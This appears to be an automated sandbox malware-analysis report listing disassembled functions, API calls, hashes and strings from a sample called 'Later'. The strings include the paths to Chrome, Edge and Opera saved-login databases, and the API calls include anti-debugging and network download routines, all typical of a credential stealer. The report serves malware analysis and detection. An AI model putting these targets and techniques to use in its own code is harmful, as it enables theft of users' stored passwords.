Function 01401250 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

\Microsoft\Edge\User Data\Default\Login Data, xrefs: 014012F1
\Opera Software\Opera GX Stable\Login Data, xrefs: 01401291
\Opera Software\Opera Stable\Login Data, xrefs: 014012C1
\Google\Chrome\User Data\Default\Login Data, xrefs: 01401274

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID:
String ID: \Google\Chrome\User Data\Default\Login Data$\Microsoft\Edge\User Data\Default\Login Data$\Opera Software\Opera GX Stable\Login Data$\Opera Software\Opera Stable\Login Data
API String ID: 0-1927145488
Opcode ID: f424113337b6f99752932ac431c0ef52a2f41df1a0851ee281da75131033ec52
Instruction ID: 232d0dd30917e24300985ab505ff971a73df22a9b7c3634053a6160220dbd810
Opcode Fuzzy Hash: f424113337b6f99752932ac431c0ef52a2f41df1a0851ee281da75131033ec52
Instruction Fuzzy Hash: AB11E072684284ABE331DFC1E819B163BE1F732B14F16024DD2251F3C4C7BA180C9B81

Function 014F51C6 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 014F521A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 014F5264
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 014F532A

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 5363dfa8d1c3eda46ff61f59a24ce87137008ac01cf62b8582797199a4dd35dc
Instruction ID: 8c88554e03b4de9379dc669492f0681a389088f450611345313e9c259efff231
Opcode Fuzzy Hash: 5363dfa8d1c3eda46ff61f59a24ce87137008ac01cf62b8582797199a4dd35dc
Instruction Fuzzy Hash: 08619F75A002079BEB299F2DD881B6A77E8EF14300F10417EEA15CA7A5EB74E941CF50

Function 00C6279E Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C61CBA,00000000), ref: 00C62891
InternetReadFile.WININET(00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00C61CBA,00000000), ref: 00C628C8

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 417ced1aed8dfea870ee56d9f314b2762be5b2851f7851a4fedf51557246832a
Instruction ID: 2525d6205e42782bb6d4f7b6cd1c39a35806d438fe21dfe092ca45ed9424a20c
Opcode Fuzzy Hash: 417ced1aed8dfea870ee56d9f314b2762be5b2851f7851a4fedf51557246832a
Instruction Fuzzy Hash: 0B41B472904A09BFEB30DA95CCC5FBF77BCEB44724F10406EFA11A7181DA719E41AA64

Function 014E4DD4 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 014E4ECC
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 014E4ED6
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 014E4EE3

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: dd1c243096022ac29a643b953edf589e54b6e1e7383cf85ea5b3c76f8ad71569
Instruction ID: a58f2a21dd06719ee17955b84e7a7a6f4cfd1315642528d8b85fcdb3e69e70c6
Opcode Fuzzy Hash: dd1c243096022ac29a643b953edf589e54b6e1e7383cf85ea5b3c76f8ad71569
Instruction Fuzzy Hash: C631C27490122DABCB61DF69D888B8DBBF8BF58311F5041EAE51CA6260E7709B858F44

Function 00C540C1 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C540DE
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C5411F
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C5412A

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 9966963ef35410867fd55ddf6137dffc89bb852aed06754d844e445b2fe67df3
Instruction ID: b7331f0a3336a2466985164d0f007de71826c1b55f3753419b0f954d0f3965b2
Opcode Fuzzy Hash: 9966963ef35410867fd55ddf6137dffc89bb852aed06754d844e445b2fe67df3
Instruction Fuzzy Hash: A2118275E01228BFDB508F959C44FAFBFBCEB45B60F104155FD14E7290C6704A448BA5

Function 00C5A51A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00C6991A,?,00C8098C,?), ref: 00C5A547
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00C6991A,?,00C8098C,?), ref: 00C5A559

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e838f6141de14ca40c493c51f96c3bf856a9620d2669e22e259d4ca82d2a0748
Instruction ID: 439f4c4fcb661425355c2931d01ddcb4baba839644615b09458bc48f9ad179b8
Opcode Fuzzy Hash: e838f6141de14ca40c493c51f96c3bf856a9620d2669e22e259d4ca82d2a0748
Instruction Fuzzy Hash: 39F0E23510422DBBDB20AFA4DC48FEA77ACFF08361F008255B908D2181E6309A44DBA1

Function 00C48BCC Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C48D0A), ref: 00C48BE1
CloseHandle.KERNEL32(?,?,00C48D0A), ref: 00C48BF3

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 3ccd0f36f78e678ca18ad12b58271b6c4bfb1f43501ec9cf6519166b3c0fde7f
Instruction ID: ae8ee20a6b5bd32369d1707aa9cc293852770f14aba8bec470d48f23b2024d68
Opcode Fuzzy Hash: 3ccd0f36f78e678ca18ad12b58271b6c4bfb1f43501ec9cf6519166b3c0fde7f
Instruction Fuzzy Hash: 3AE08671004600AFE7612B50EC05FB77BA9FF00311B30851EF55581430CB715CD1EB50

Function 00C1A2B5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C18EB7,?,?,?,00000001), ref: 00C1A2BA
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C1A2C3

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 461ce4a9601b5eddd150e812af05f122b6d2fb01f30cf7bc7b5a3457478d6a51
Instruction ID: 5527b35fe4406a73cda90328eed4f5952554c254489a51de9cc18ce42854b5d8
Opcode Fuzzy Hash: 461ce4a9601b5eddd150e812af05f122b6d2fb01f30cf7bc7b5a3457478d6a51
Instruction Fuzzy Hash: 7AB09231064708ABCA802B91EC09B8C3F68EB46A62F104010F60D44070CB6264548B99

Function 014F5419 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 014F546D

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: dfd6e5d62fe2ce02afdf66f7d02dca23b2e4be2934edb3a4e4a8652f1f76b19b
Instruction ID: 296774cd83034426206be3c7ffe9326cafef5c5a528ee9f5b577fe6f6db8f377
Opcode Fuzzy Hash: dfd6e5d62fe2ce02afdf66f7d02dca23b2e4be2934edb3a4e4a8652f1f76b19b
Instruction Fuzzy Hash: 9D219272701206ABEF289A2ADC45B7B77A8EF55312F10407FEE05DA360EB74E944C750

Function 014F50A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93

EnumSystemLocalesW.KERNEL32(014F51C6,00000001,00000000,?,-00000050,?,014F57FA,00000000,?,?,?,00000055,?), ref: 014F5112

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9f4d5dbf1cb1e7c34fb4b51dbc3b586cb1fb0efd27019575f93b420217248f0f
Instruction ID: 471939fc53be0b5413b46e9303469d4027daae729916471788d7458379a7c182
Opcode Fuzzy Hash: 9f4d5dbf1cb1e7c34fb4b51dbc3b586cb1fb0efd27019575f93b420217248f0f
Instruction Fuzzy Hash: EA11083B6007019FDB189F3DC9A15BAB7A2FF80369B15482EDA878BB50E771B542C740

Function 014F5648 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,014F53E2,00000000,00000000,?), ref: 014F5674

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 779b63d86bbd8cd1bba5ec99dccb84e834993a6c8bbdc0828a59be81a2a57fd3
Instruction ID: 3b567016954bf0bbe3c08cbe10214f6efecff1ccfdc73831ae95402d72b6ad89
Opcode Fuzzy Hash: 779b63d86bbd8cd1bba5ec99dccb84e834993a6c8bbdc0828a59be81a2a57fd3
Instruction Fuzzy Hash: 7C01FE32600112BFFB2856299C156BB7754EB40254F05443EDF1EAB390DA74FD41C690

Function 014F513B Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93

EnumSystemLocalesW.KERNEL32(014F5419,00000001,00000000,?,-00000050,?,014F57C2,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 014F5185

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 95ce72bdf2b188599afdeaa59e2472f9cb82e26e290d5017f036e9a3f7fe692f
Instruction ID: 3a1656c2fbdf3a4d711d5f15c0052adae88e2fff9533449c56bf2a634fad74a7
Opcode Fuzzy Hash: 95ce72bdf2b188599afdeaa59e2472f9cb82e26e290d5017f036e9a3f7fe692f
Instruction Fuzzy Hash: AEF0F6367003055FDB256F7A9C80A7ABB91FF80368F15442EEB058F760D671A841C710

Function 014EC27C Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 014E598B: EnterCriticalSection.KERNEL32(?,?,014E8E0C,00000000,015258B0,0000000C,014E8DD4,?,?,014EC20B,?,?,014EC08B,00000001,00000364,?), ref: 014E599A

EnumSystemLocalesW.KERNEL32(014EC26F,00000001,01525AB8,0000000C,014EC6E4,00000000), ref: 014EC2B4

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 0c817cd783e82b978f669f6dcf072a8ba5178a9860dfe3dee49d5280a14bb5c8
Instruction ID: d036886099a4cdf2f5d9aa243376f85699adada0606c81d1e174ab591867f655
Opcode Fuzzy Hash: 0c817cd783e82b978f669f6dcf072a8ba5178a9860dfe3dee49d5280a14bb5c8
Instruction Fuzzy Hash: 2AF04932A00202DFDB20EF99E545B9DB7F0EB69726F10811AE520EB2A0C7B55904DF80

Function 014F5055 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 014EBEED: GetLastError.KERNEL32(00000000,?,014F1D55), ref: 014EBEF1
Part of subcall function 014EBEED: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 014EBF93

EnumSystemLocalesW.KERNEL32(014F4FAE,00000001,00000000,?,?,014F581C,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 014F508C

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 925dac118e8909a44153c6949165c584659becb63e0e4485281a20e35b55b2c9
Instruction ID: 48c8e91779e725088ff6195a35a2f68efabbbe9d19d61b41090ede0d5013c2fe
Opcode Fuzzy Hash: 925dac118e8909a44153c6949165c584659becb63e0e4485281a20e35b55b2c9
Instruction Fuzzy Hash: B8F055363002065BCB15AF3AC81866BBFA0EFC1720B0A405EEB098F361C6329842C790

Function 00C643B9 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C643D4

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 04aa5396366ddc1e3eba8463ae14a6b7aca21d91dc445aedf2757ba2b24839a0
Instruction ID: 4eef767c965901037b032eeca651585da55a45a8eaf5e9b8813bafb3da7b35d3
Opcode Fuzzy Hash: 04aa5396366ddc1e3eba8463ae14a6b7aca21d91dc445aedf2757ba2b24839a0
Instruction Fuzzy Hash: FBE04F352002099FD720AF6AE845A9BF7E8AF94760F008466FE49D7761DBB0EC558B90

Function 014EC83F Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,014EB342,?,20001004,00000000,00000002,?,?,014EA934), ref: 014EC873

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d052cd3b7e61a5e731a2e9570b6eb0af7e1756294e79fa6b369f8027f102e654
Instruction ID: f91c6e275f2d39f297613e1be9f58a8f138b88c92cc807b76becac3da25a7c64
Opcode Fuzzy Hash: d052cd3b7e61a5e731a2e9570b6eb0af7e1756294e79fa6b369f8027f102e654
Instruction Fuzzy Hash: B1E04F31540218BBCF126F66ED48AAE7F56FF54762F054426FD1565224CB328921EBD0

Function 00C30652 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00C30664

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 7f5debf8cda8af34d6d9749bb972bb47ff6eee6d4b118027a22609699ba39a0c
Instruction ID: 62ae16a336bae133ed0985d034e784b86f527b7b86531cdabbb92d1e6dfcafa2
Opcode Fuzzy Hash: 7f5debf8cda8af34d6d9749bb972bb47ff6eee6d4b118027a22609699ba39a0c
Instruction Fuzzy Hash: 8EC04CF180011DDBCB05DB90DA98EEE77BCAB05305F20006AA101F2100D7749B448B71

Function 00C1A284 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C1A28A

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 66163616d8c3c4928d0cc13ce8f6f07ae9601b5c3748006c3f59e22766290af5
Instruction ID: 6acd8712053f13aee00148a8f46f8dfd44a9744307127d45f80bae40816d874b
Opcode Fuzzy Hash: 66163616d8c3c4928d0cc13ce8f6f07ae9601b5c3748006c3f59e22766290af5
Instruction Fuzzy Hash: B3A0113002020CAB8A002B82EC08A88BFACEA022A0B008020F80C000328B32A8208A88

Function 00C7A9C7 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C7AA1D
GetSysColorBrush.USER32(0000000F), ref: 00C7AA4E
GetSysColor.USER32(0000000F), ref: 00C7AA5A
SetBkColor.GDI32(?,000000FF), ref: 00C7AA74
SelectObject.GDI32(?,00000000), ref: 00C7AA83
InflateRect.USER32(?,000000FF,000000FF), ref: 00C7AAAE
GetSysColor.USER32(00000010), ref: 00C7AAB6
CreateSolidBrush.GDI32(00000000), ref: 00C7AABD
FrameRect.USER32(?,?,00000000), ref: 00C7AACC
DeleteObject.GDI32(00000000), ref: 00C7AAD3
InflateRect.USER32(?,000000FE,000000FE), ref: 00C7AB1E
FillRect.USER32(?,?,00000000), ref: 00C7AB50
GetWindowLongW.USER32(?,000000F0), ref: 00C7AB7B

Part of subcall function 00C7ACB7: GetSysColor.USER32(00000012), ref: 00C7ACF0
Part of subcall function 00C7ACB7: SetTextColor.GDI32(?,?), ref: 00C7ACF4
Part of subcall function 00C7ACB7: GetSysColorBrush.USER32(0000000F), ref: 00C7AD0A
Part of subcall function 00C7ACB7: GetSysColor.USER32(0000000F), ref: 00C7AD15
Part of subcall function 00C7ACB7: GetSysColor.USER32(00000011), ref: 00C7AD32
Part of subcall function 00C7ACB7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C7AD40
Part of subcall function 00C7ACB7: SelectObject.GDI32(?,00000000), ref: 00C7AD51
Part of subcall function 00C7ACB7: SetBkColor.GDI32(?,00000000), ref: 00C7AD5A
Part of subcall function 00C7ACB7: SelectObject.GDI32(?,?), ref: 00C7AD67
Part of subcall function 00C7ACB7: InflateRect.USER32(?,000000FF,000000FF), ref: 00C7AD86
Part of subcall function 00C7ACB7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C7AD9D
Part of subcall function 00C7ACB7: GetWindowLongW.USER32(00000000,000000F0), ref: 00C7ADB2
Part of subcall function 00C7ACB7: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C7ADDA

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 5929c4f8858aa6809ce7a025d1885cac88d98c9d2cfcff248ba6c64037c77c1c
Instruction ID: cc240368a9af05135307ef7a22f47e0e35e8c9e66b1bdeab929d910a29d6d4e5
Opcode Fuzzy Hash: 5929c4f8858aa6809ce7a025d1885cac88d98c9d2cfcff248ba6c64037c77c1c
Instruction Fuzzy Hash: E9918A72008301AFC7919F64DC08B6FBBA9FF89331F204A19F9A6961A0D771D948DF56

Function 00C027FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00C10F16: std::exception::exception.LIBCMT ref: 00C10F4C
Part of subcall function 00C10F16: __CxxThrowException@8.LIBCMT ref: 00C10F61

__wcsnicmp.LIBCMT ref: 00C0286A
__wcsnicmp.LIBCMT ref: 00C0287E
__wcsnicmp.LIBCMT ref: 00C02896
__wcsnicmp.LIBCMT ref: 00C028AE
__wcsnicmp.LIBCMT ref: 00C028C6
__wcsnicmp.LIBCMT ref: 00C028DE
__wcsnicmp.LIBCMT ref: 00C028F6
__wcsnicmp.LIBCMT ref: 00C0290A
__wcsnicmp.LIBCMT ref: 00C02948
__wcsnicmp.LIBCMT ref: 00C0295C
__wcsnicmp.LIBCMT ref: 00C02970
__wcsnicmp.LIBCMT ref: 00C02984

Strings

#requireadmin, xrefs: 00C02890
#pragma compile, xrefs: 00C02864
", xrefs: 00C3FB09
#include-once, xrefs: 00C028C0
